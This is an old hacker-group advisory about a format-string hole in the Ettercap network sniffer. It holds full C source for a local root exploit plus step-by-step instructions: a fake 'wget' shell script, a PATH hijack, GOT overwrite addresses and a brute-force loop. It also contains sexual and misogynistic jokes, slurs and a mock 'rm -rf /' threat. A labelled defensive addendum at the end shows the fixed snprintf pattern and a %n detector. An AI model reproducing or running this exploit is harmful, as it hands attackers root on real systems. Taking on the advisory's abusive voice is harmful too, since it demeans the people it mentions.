++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++
ALERT! ROOT HOLED IN SUPER PENETRATOR TESTING PROGRAM ETTERCAP! ALERT!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++ GOBBLES SPECIAL BONUS: LONG TIME GOBBLES MEMBER ALICIA (WHO VERY BEAUTIFUL YOUNG BLONDE AND HAVE A NICE RAQ HEHEHE) OFFER UP HER LONG TIME FULL DISCLOSURE VIRGINITY TO COMMUNITY BY GIVING IT UP IN FORM OF SUPER DUPER ROOT EXPLOIT ATTACHED BELOW! +++

GOBBLES thinks today is a sad day for computer security world and is upset that he GOBBLES is the one who must break the news to the public at large about this matter but GOBBLES understands the role of hero that he have been given by oppressors and will speak out and do all he can to liberate the world from the evils of the security industry. So that is what this GOBBLES advisory is all about it not just about a bug in a program but it about the sad state of security industry in general. Right now GOBBLES is listening to Smashing Pumpkin song Today which is really happy sounding song about suicide which is sort of how GOBBLES feel right now (no not suicidal) but what GOBBLES mean is that while GOBBLES is a happy and cheerful sounding person when he write he really sad at heart. GOBBLES have a lot of heart as do all members of GOBBLES Labs and having a lot of heart is a requirement before you can come here to be a member of GOBBLES Labs. So because GOBBLES have mentioned song he will now use he mastered copy/paste skills to give you lyrics to read and think about to understand the mood GOBBLES is in while writing this advisory for you to read.

Today is the greatest day I've ever known,
Can't live for tomorrow, tomorrow's much too long,
I'll burn my eyes out, before I get out.
I wanted more than life could ever grant me,
bored by the chore of saving face...
Today is the greatest day I've ever known,
Can't wait for tomorrow, I might not have that long.
I'll tear my heart out, before I get out.
Pink ribbon scars that never forget,
I tried so hard to cleanse these regrets,
My angel wings were bruised and restrained,
My belly stings...
Today is... Today is... Today is...
The greatest day...
I want to turn you on, I want to turn you on,
I want to turn you on, I want to turn you...
Today is the greatest...
Today is the greatest day...
Today is the greatest day
That I have ever really known.

Now GOBBLES have communicated to you how he feel right now and what he emotions are so now GOBBLES will go on to the more of the advisory.

PRODUCT
*******

Ettercap website: http://ettercap.sourceforge.net

DESCRIPTION
***********

GOBBLES do humbly offer he copy/paste skills to all penetrators reading:

[ettercap.gif]

0.6.2 RELEASED !!

Short Description:
Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.

It's possible to sniff in four modes.
+ IP Based, the packets are filtered on IP source and dest
+ MAC Based, packets filtered on mac address, useful to sniff connections through gateway
+ ARP based, uses arp poisoning to sniff in switched lan between two hosts (full-duplex).
+ PublicARP based, uses arp poisoning to sniff in switched lan from a victim host to all other hosts (half-duplex).

Cool Features:
Characters injection in an established connection: you can inject characters to server (emulating commands) or to client (emulating replies) maintaining the connection alive !!
SSH1 support: you can sniff User and Pass, and even the data of an SSH1 connection. ettercap is the first software capable to sniff an SSH connection in FULL-DUPLEX
HTTPS support: you can sniff http SSL secured data... and even if the connection is made through a PROXY
Plug-ins support: You can create your own plugin using the ettercap's API.
Password collector for: TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE (other protocols coming soon...)
Packet filtering/dropping: You can set up a filter that searches for a particular string (even hex) in the TCP or UDP payload and replaces it with yours or drops the entire packet.
OS fingerprint: you can fingerprint the OS of the victim host and even its network adapter
Kill a connection: from the connections list you can kill all the connections you want
Passive scanning of the LAN: you can retrieve infos about: hosts in the lan, open ports, services version, type of the host (gateway, router or simple host) and estimated distance in hops.

Interface:
All these features are integrated with an easy-to-use and pleasureful ncurses interface. (see screenshots)

Platform:
Linux 2.0.x
Linux 2.2.x
Linux 2.4.x
FreeBSD 4.x
OpenBSD 2.[789]
NetBSD 1.5
Mac OS X (darwin 1.3.x)

Required Library:
It doesn't require any lib such as libpcap, libnet or libnids, even ncurses is not necessary, but strongly recommended ;)
If you want SSH1 and/or HTTPS support, ettercap requires OpenSSL libraries

Hehehe OK so now you penetrators all know what Ettercap is! GOBBLES know he no need to explain it on he own to you though because it is a pretty gui for sniffing and poisoning and such and while it is not all point and click (you have to use arrow keys and enter and some others if you're tricker hehe) and GOBBLES just assume it to be a favorite program of security professionals everywhere. ;)

SECURITY HISTORY
****************

GOBBLES extensive research into history of security of "Penetrator Friend" product Ettercap and was not able to find any news about security holes in it hehehehe...
BACKGROUND
**********

GOBBLES do now present you more of copy/paste techniques, this time from file README that come with Ettercap hacking program.

Kiddie: A friend of mine told me that it is possible to sniff on a LAN... so I bought a switch ;)
NaGoR: mmhhh....
Kiddie: Now my LAN is SECURE ! you can't sniff my packets... ah ah ah
NaGoR: are you sure ? look at ettercap doing its work...
Kiddie: Oh my god... it sniffs all my traffic !! I will use only ciphered connections on my LAN, so ettercap can't sniff them ! ah ah ah
NaGoR: mmhhh....
Kiddie: Now I'm using SSH. My LAN is SECURE !
NaGoR: are you sure ? look at ettercap doing its work...
Kiddie: shit !! grrrr...

"a false sense of security, is worse than insecurity" -- Steve Gibson

hey folks... wake up ! the net is NOT secure !! ettercap demonstrates that now is the time to encourage research on internet protocols to make them more secure.

Hehehe ok it GOBBLES again writing advisory no more paste from skilled copy/paste demonstration hehehe ok. Anyhow this NaGoR programmer of Ettercap sound like a cocky guy so GOBBLES did decide to have a talk to him about bugs found by GOBBLES researchers in GOBBLES Labs in product Ettercap. . .

GOBBLES: Hi Friend, NaGoR! It me GOBBLES! hehehe.
NaGoR: How did you get this screenname!??!
GOBBLES: Hehehe Friend calm down! GOBBLES is hacker too!
NaGoR: Oh... what do you want? I really want to get back to listening to my techno beatz and work on my k0dez.
GOBBLES: hehehe Friend GOBBLES want to talk to you about your k0dez...
NaGoR: Oh ?
GOBBLES: hehehe yes but first GOBBLES want to ask you question about something...
NaGoR: mmkay, what ?
GOBBLES: Well GOBBLES wondering if you ever watch the tv cartoon sitcom show The Simpsons?!?
NaGoR: no, television is only a distraction that keeps me from my techno beatz and my k0dez.
GOBBLES: Oooh, you are really missing out GOBBLES think! Anyhow GOBBLES will tell you of part of a funny episode of The Simpsons that GOBBLES did watch the other day. Anyhow in this episode Bart (he the troublemaker boy of the Simpsons family) was put on drug to correct he behavior since he school Principal Skinner decided that he Bart were infected with ADHD diseases and if Bart parent Marge and Homer did not put he on medication that he would get expelled from Springfield elementary. Hehe GOBBLES own doctor say GOBBLES have same mind problem ADHD but it is now under control with proper medications big thank you from GOBBLES to DrStngLov for fixing all that wrong with GOBBLES mental problems hehe now GOBBLES is fixed and can always be focus and not ever get distracted in he conversations. Anyhow Bart is put on drugs for ADHD and then he is in class. Then some other stuff happen in the episode that GOBBLES do not remember so it must not have been too important hehe except for when the two dogs "go at it" hehe. So then Bart teacher put on a sex video teaching the kids about what sex is. The video they watch in class is about a bunny rabbit named Fuzzy Bunny (who is boy rabbit) going through changes to adult bunny called puberty (hehe GOBBLES have funny stories about himself from when GOBBLES was going through this) and then Fuzzy Bunny meets a beautiful girl bunny named Fluffy Bunny and then like Fuzzy and Fluffy fall in love but the video explain how the cute couple resist their inhibitions until they get married and then it show Fluffy and Fuzzy Bunny kissing at they wedding (GOBBLES was moved by beauty of cartoon ceremonial marriage on cartoon and shed many tear) and then the view turn away from cartoon on cartoon and cheezy porno music begin playing and you hear Fluffy Bunny crying out of passion and you see elementary school teacher smoking cigarette and saying "she's faking" or something like that hehehehehe. =)
NaGoR: wtf is the point of that? dude let me go back to my k0dez.
GOBBLES: hehehe ok what code are you working on Friend?
NaGoR: ettercap! it super sniffer program showing that the net is not secure!
GOBBLES: hehehe GOBBLES can hack you if you are using ettercap...
NaGoR: no you can't its a security program!
GOBBLES: hehehe watch this!
NaGoR: ok...
NaGoR: GOBBLES IS COOL HEHE
NaGoR: wtf how did you make me type that?!?!
GOBBLES: hehehe GOBBLES use GOBBLES-own-ettercap-remote-8.c for that one to hack your box hehehe then he run ./ettercap and use hijacking techniques with it like a true penetrator to inject characters into sessions hehehe.
NaGoR: liar you can't exploit ettercap! Really, how did you do that?!?
GOBBLES: hehehe... GOBBLES do like grep printf * >file; ls -l file and see that there almost 50k of printf in ettercap and GOBBLES wonder when you will learn about smart programming and start using write() instead like OpenSSH programmers do to avoid exploits hehehhe....
NaGoR: wtf?
GOBBLES: hehe friend it ok GOBBLES do nothing bad to you he just showing off he latest proof of concept penetrator friendly code that hack ettercap. :)
Al Huger: Did I hear "proof of concept" and "code" in the same sentence? May I have a copy so I can study it and create signatures for different IDS?
GOBBLES: hmmmm where did he come from GOBBLES wonder?
NaGoR: I don't know... I hear that a lot though!
GOBBLES: OK nevermind...
NaGoR: wait! how does this bug work?
GOBBLES: Well GOBBLES find hundred different things to exploit in sloppy ettercap code and recommend you rewrite the entire code securely but to be nice GOBBLES will give you just one of the many exploits made for it. Then GOBBLES leave the rest of the bug finding up to you because it is not GOBBLES job to show you all bug in your program, just one enough that get you root should show you what you are doing wrong and then learning from those mistakes and finding rest of holes in you code should be good learning experience for you hehehe you don't really want GOBBLES to do all it for you because then you really learn nothing. ;)
NaGoR: quit being an ass and show me everything.
GOBBLES: OK Friend if you are going to use harsh language with GOBBLES then GOBBLES will just run exploit #8 again and then instead of talking as you online with you ettercap program GOBBLES will do rm -rf / and then you maybe be more respectful...
NaGoR: please don't! that one will be enough, thank you GOBBLES!
GOBBLES: No problem GOBBLES email you exploit right now... ;)
Al Huger: Can you cc me a copy?
GOBBLES: hehehehehe...

THE PROBLEM
***********

OK while there were many holes in Ettercap which many of which are easily remotely exploited to get root by skillful programmer GOBBLES is only to show you one hole but it still get you r00t when right conditions are there. And GOBBLES is being nice today and will let you all have the root getting Ettercap exploit hehehehe but first we will see how the problem is.

GOBBLES@localhost:~$ /usr/local/sbin/ettercap %x

ettercap 0.6.2
brought from the dark side of the net by ALoR and NaGA...
may the packets be with you...

Invalid host address 8102438 !!

GOBBLES@localhost:~$ /usr/local/sbin/ettercap %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

ettercap 0.6.2
brought from the dark side of the net by ALoR and NaGA...
may the packets be with you...

Invalid host address 8102438.8102de0.8102d80.810212f.8102129.806e5b3.bff0efbc.8126fc4.61766e49.
2064696c.74736f68.64646120.73736572.2e782520.252e7825.78252e78.2e78252e.
252e7825.78252e78.2e78252e.252e7825 !!

GOBBLES@localhost:~$ /usr/local/sbin/ettercap %n

ettercap 0.6.2
brought from the dark side of the net by ALoR and NaGA...
may the packets be with you...

Ooops !! Somewhere in the stack a pointer got crazy...
[ettercap] Segmentation Fault...

===========================================================================
To report this error follow these steps:
1) recompile ettercap in debug mode :
   "configure --enable-debug && make clean && make"
2) reproduce the critical situation
3) make a report :
   "tar zcvf error.tar.gz ettercap_debug.log "
4) get the gdb backtrace :
   - "gdb ettercap core"
   - at the gdb prompt "bt"
   - at the gdb prompt "quit" and return to the shell
   - copy and paste this output.
5) mail us the output of gdb and the error.tar.gz
============================================================================

GOBBLES@localhost:~$

Hehehehe ok now so you get the idea now? GOBBLES would have thought that programmers learn from /invite panasync #%s%s%s%s%s bug in BitchX about not making silly format bug errors in their software but it appears that this is not the case with Ettercap authors.

GOBBLES have this to say about Ettercap bugs: GOBBLES very sad to find that it can not be expected for a security program to be programmed securely and GOBBLES now have serious doubts about legitimacy of security program programmers who cannot seem to grasp simple concepts of secure programming. The problems GOBBLES have here is that these 'experts' making security programs obviously do not know much about security, when their own code is exploitable for uid0 by malicious attackers. GOBBLES think that any self-proclaimed security program with root holes in it, if the programmer is a real security guru and not a penetrator, that it really is just a sophisticated backdoor made by evil programmer who lazy and want easy way into systems. . .

Anyhow GOBBLES have included exploit here for Mr. Alfred Huger that will get uid0 of r00t (hehehe r00t have two zeros like one for uid(0) and one for gid(0) and it look like root which have both hehehe GOBBLES just cracked the code and he not even in openwall hehehe) if Ettercap have been installed on the system like with ./configure --enable-suid for like letting lesser admin use ettercap without r00t on the system but this bug give it to him anyways if he want it hehehe.

GOBBLES would like to say that if you are user of Ettercap and new release come out where it say "All security bugs fixed" that you should be aware because there are still many, many, many more that GOBBLES did not write about which GOBBLES is leaving to friends ALoR and NaGoR to fix in they program and maybe they will not find them all so be careful of running it in environment where someone malicious might send you packets to hack you ettercap program over network...

WORKAROUNDS
***********

GOBBLES best advice is to stop using Ettercap and similar programs since there is no real legitimate reason to need to sniff traffic like this and to do the things that ettercap can and that using this program and ones like it is only showing off that you have malicious intentions.

GREETS
******

dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble, knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org, blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet, bugtraq (thanks aleph1 and david ahmad for devoting your time to a great list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley, manly p hall, franz bardon, dennis ritchie, nietzsche, w.
richard stevens, radiohead, george michael, larry wall, beethoven, francis bacon, bruce willis, bruce schneier, alan turing, john von neumann, donald knuth, michael abrash, robert sedgewick, richard simmons, government boy, ralph lauren, kevin mitnick, david koresh, the violent femmes, legions of doom, quentin tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky, hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock, ray bradbury, linux torvalds, alyssa milano, sarah michelle gellar, jennifer lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci, nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo dolls, savage garden, george bush, john howard, tony blair, ashida kim, andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi, deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster, attrition.org, cliff stoll, bill gates, alan cox, george harrison (hehehe the beatles will live forever), berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captain crunch (the phreak, not the cereal guy), tony the tiger (the cereal guy, not the phreak), juliette lewis (hehehe when you say 'you stupid bitch' in natural born killers GOBBLES get all hard!) and all our friends and family.

Anyhow here is GOBBLES exploit for Ettercap. This exploit may only be published on mailing lists if the whole above GOBBLES advisory is intact without any modifications. Oh yeah that go for all archive places too like packetstorm (GOBBLES love you for being good and nonprofit) or whatever else sites there is you too must also include advisory with exploit. That is GOBBLES law.

/*
 * own-ettercap - Ettercap local root exploit
 *  - Alicia [GOBBLES]
 *
 * Ettercap has a configuration option called PERMIT_SUID. This allows the
 * administrator to make the binary SUID root. Among at least half a dozen
 * vulnerabilities in the program, there is a format string problem that can
 * be triggered if ncurses is present and the PERMIT_SUID option is used.
 *
 * No shellcode is needed for the exploit. It should work fine for systems
 * using ELF/x86. The exploitation idea is to overwrite the printf() GOT
 * with an address in the program's own code segment, namely for the
 * following:
 *
 *   441 void Main_Check_NewRelease(void)
 *   [...]
 *   535   sprintf(wget, "wget http://%s/download/ettercap-%s.tar.gz" ...
 *   536   system(wget);
 *
 * Incidentally, lines 535-536 may or may not be exploitable alone.
 *
 * Openwall, StackGuard, Stackshield, PaX, libsafe, and Solaris
 * noexec_user_stack do nothing to stop this; FormatGuard might help.
 * Considering that most of our exploits defeat all of the above anyway, one
 * wonders what good they really do.
 *
 * We have an OpenSSH 2.9 sshd remote buffer overflow vulnerability (Hi Theo,
 * you do good work!). We'll post the details of the hole when we see that
 * securityfocus has stopped moderating us and offers an apology. It's a shame
 * that our research, which matches 95% of Bugtraq posts, is moderated on
 * the grounds of it being "technically feeble." Fucking cocksuckers.
 *
 * http://www.bugtraq.org/advisories.html
 *
 * Anyway, this exploit is pretty much penetrator proof, but it may not be
 * totally script kid proof. We apologize.
 *
 * 1. Change ECAP_PATH to the location of ettercap.
 * 2. DEF_SLEN and DEF_ALIGN should be fine as they are.
 * 3. DEF_GOB will unlikely work for you. Brute force it in step 7.
 * 4. Make a shell script named 'wget' in your current working directory:
 *      bash-2.05$ cat > wget ; chmod +x wget
 *      #!/bin/sh
 *      /bin/sh
 *      ^D
 * 5. Grab the printf() GOT address:
 *      bash-2.05$ objdump -R ettercap | grep printf
 *      0808c478 R_386_JUMP_SLOT   printf
 * 6. This is where most penetrators are likely to screw up. Disassemble
 *    Main_Check_NewRelease and try to find where the first sprintf()
 *    argument is prepared for being pushed onto the stack. Sample:
 *      0x8079268 :  mov    0xfffffff0(%ebp),%eax
 *      0x807926b :  push   %eax
 *      0x807926c :  lea    0xffffea58(%ebp),%eax
 *      0x8079272 :  push   %eax
 *      0x8079273 :  push   $0x80880a0
 *      0x8079278 :  lea    0xffffe9e8(%ebp),%eax
 *      0x807927e :  push   %eax
 *      0x807927f :  call   0x804f418
 *      0x8079284 :  add    $0x10,%esp
 *      0x8079287 :  add    $0xfffffff4,%esp
 *      0x807928a :  lea    0xffffe9e8(%ebp),%eax
 *      0x8079290 :  push   %eax
 *      0x8079291 :  call   0x804edd8
 * 7. Now we brute force the stack stepping:
 *      i=1; while [ $i -le 40 ] ; do ./expl 0x0808c478 0x8079268 $i; \
 *      i=`expr $i + 1`; done
 *
 * Some values of retadd aren't accounted for, but you should encounter no
 * problems unless you try testing with 0x41414141 and such.
 *
 * For old glibc, this will be useless. Should present a good programming
 * challenge for 90% of the team bugtraq commercial penetrator "academic
 * re$earch community" though. One wonders why the only ones who seem to
 * defend full disclosure are the ones who have something to lose in its
 * absence. Others just seem to think it's anti-Microsoft or anti-BigVendor.
 * As a good friend says, if they're so concerned about securing computer
 * networks worldwide, then why the fuck are they capitalizing on it?
 *
 * Fact: They profit with insecurity.
 * Fact: With security, they'd make no profit.
 * Conclusion: They don't want security.
 * Fact: They need customers to profit with insecurity.
 * Fact: The customers must be aware of their insecurity.
 * Conclusion: They need to do everything possible to scare the public.
 *
 * Microsoft: It's like shouting "FIRE!" in a cinema!
 * Securityfocus: But the cinema really is on fire!
 * Counter-Securityfocus: So you burn down the whole city as a "necessary
 * evil" to let everyone know the threat of the cinema on fire?
 *
 * Hey, securityfocus will probably reject this advisory, but then again,
 * they rejected our banner(1) exploit too. In some ways we hope they do
 * reject this as being too fluffy, because there are many people out there
 * who'd like to see the saga continue in a much more devastating way...
 *
 * - Alicia
 */

/* standard headers for the calls used below (the header names were lost
 * in the mailing-list copy of this post) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ECAP_PATH "./ettercap"
#define DEF_GOB   20
#define DEF_SLEN  21
#define DEF_ALIGN 3

void usage(char *prog)
{
    fprintf(stderr, "GOBBLES ettercap local root exploit\n");
    fprintf(stderr, "usage: %s retloc retadd [gob] [align] [slen]\n", prog);
    exit(EXIT_FAILURE);
}

/* non-zero if the bytes contain a NUL or '%', which would break the argument */
int chk_clean(void *addr, size_t len)
{
    return (memchr(addr, '\0', len) || memchr(addr, '%', len));
}

void mk_fmt(unsigned long retloc, unsigned long retadd, int gob, int align,
            int slen, char **attack)
{
    char *ptr;
    unsigned long len, rllo, rlhi, ralo, rahi;

    if(!(*attack = malloc(gob * 4 + 256))) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }
    ptr = *attack;
    len = slen + align + 16 + gob * 9;
    rllo = retloc;
    rlhi = retloc + 2;
    ralo = retadd & 0xffff;
    rahi = retadd >> 16 & 0xffff;
    if(ralo > rahi) {
        rllo ^= rlhi, rlhi ^= rllo, rllo ^= rlhi;
        ralo ^= rahi, rahi ^= ralo, ralo ^= rahi;
    }
    ralo -= len;
    rahi -= ralo + len;
    while(align--) {
        *ptr++ = 'G';
    }
    /* note: cast-as-lvalue is a GCC extension of that era (removed in GCC 4) */
    *((unsigned long *) ptr)++ = 0xdefaced;
    *((unsigned long *) ptr)++ = rllo;
    *((unsigned long *) ptr)++ = 0xdefaced;
    *((unsigned long *) ptr)++ = rlhi;
    if(chk_clean(ptr - 16, 16)) {
        fprintf(stderr, "bad: %#lx (& +2) - your skeelz needed!\n", retloc);
        exit(EXIT_FAILURE);
    }
    while(gob--) {
        memcpy(ptr, "%8x.", 4);
        ptr += 4;
    }
    sprintf(ptr, "%%%luc%%hn%%%luc%%hn", ralo, rahi);
}

int main(int argc, char **argv)
{
    char *attack;
    unsigned long retloc, retadd;
    int gob = DEF_GOB, align = DEF_ALIGN, slen = DEF_SLEN;

    if(argc < 3)
        usage(argv[0]);
    retloc = strtoul(argv[1], NULL, 0);
    retadd = strtoul(argv[2], NULL, 0);
    if(argc > 3)
        gob = atoi(argv[3]);
    if(argc > 4)
        align = atoi(argv[4]);
    if(argc > 5)
        slen = atoi(argv[5]);
    mk_fmt(retloc, retadd, gob, align, slen, &attack);
    setenv("PATH", ".:/bin:/sbin:/usr/bin:/usr/sbin", 1);
    execl(ECAP_PATH, "ettercap", attack, (char *) 0);
    perror("execl");
    free(attack);
    exit(EXIT_FAILURE);
}
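As an added example, not from the GOBBLES advisory and not Ettercap's source, here is the bug class behind the `ettercap %x` / `%n` transcript above in C: a hypothetical error reporter that lets the host argument reach snprintf as its format, the corrected form with a literal format and `%s`, and a small scanner that counts the conversions an untrusted string would trigger and flags `%n`. The message text mirrors the advisory's "Invalid host address ... !!"; the function names, the 256-byte buffer and the sample inputs are assumptions constructed for this example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the bug pattern (not Ettercap's code):
 * the untrusted host string ends up as the FORMAT argument, so "%x" dumps
 * stack words and "%n" writes memory, exactly what the advisory transcript
 * shows. -Wformat-security (an error by default on some distributions)
 * flags this line; the pragma silences it only so the bad form compiles. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
static int report_host_vulnerable(char *out, size_t n, const char *host)
{
    char msg[256];
    snprintf(msg, sizeof msg, "Invalid host address %s !!", host);
    return snprintf(out, n, msg);          /* BUG: msg is the format string */
}
#pragma GCC diagnostic pop

/* Fixed form: the format is a literal; the untrusted value is only a %s arg.
 * With host = "%x" the output contains the two characters '%' 'x' verbatim. */
static int report_host_fixed(char *out, size_t n, const char *host)
{
    return snprintf(out, n, "Invalid host address %s !!", host);
}

/* Detection helper: count the conversions printf would act on if s were
 * used as a format, and flag %n/%hn, which write to memory. "%%" is a
 * literal percent sign and is not counted. Useful for scoring log lines or
 * argv values such as the advisory's "%x.%x.%x..." probe. */
static int count_conversions(const char *s, bool *writes_memory)
{
    int count = 0;
    *writes_memory = false;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '\0')
            break;
        if (*p == '%')
            continue;                      /* "%%" */
        /* skip flags, width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p))
            p++;
        if (*p == '\0')
            break;
        count++;
        if (*p == 'n')
            *writes_memory = true;
    }
    return count;
}

int main(void)
{
    char out[128];
    bool writes;
    const char *probe = "%x.%x.%x.%x";    /* constructed, as in the advisory */

    /* both forms agree on a benign host; only the fixed one is safe with a probe */
    report_host_vulnerable(out, sizeof out, "10.0.0.1");
    printf("benign:  %s\n", out);
    report_host_fixed(out, sizeof out, probe);
    printf("fixed:   %s\n", out);
    printf("%s -> %d conversions, writes=%d\n", probe,
           count_conversions(probe, &writes), writes);
    count_conversions("%hn", &writes);
    printf("%%hn flagged: %d\n", writes);
    return 0;
}
```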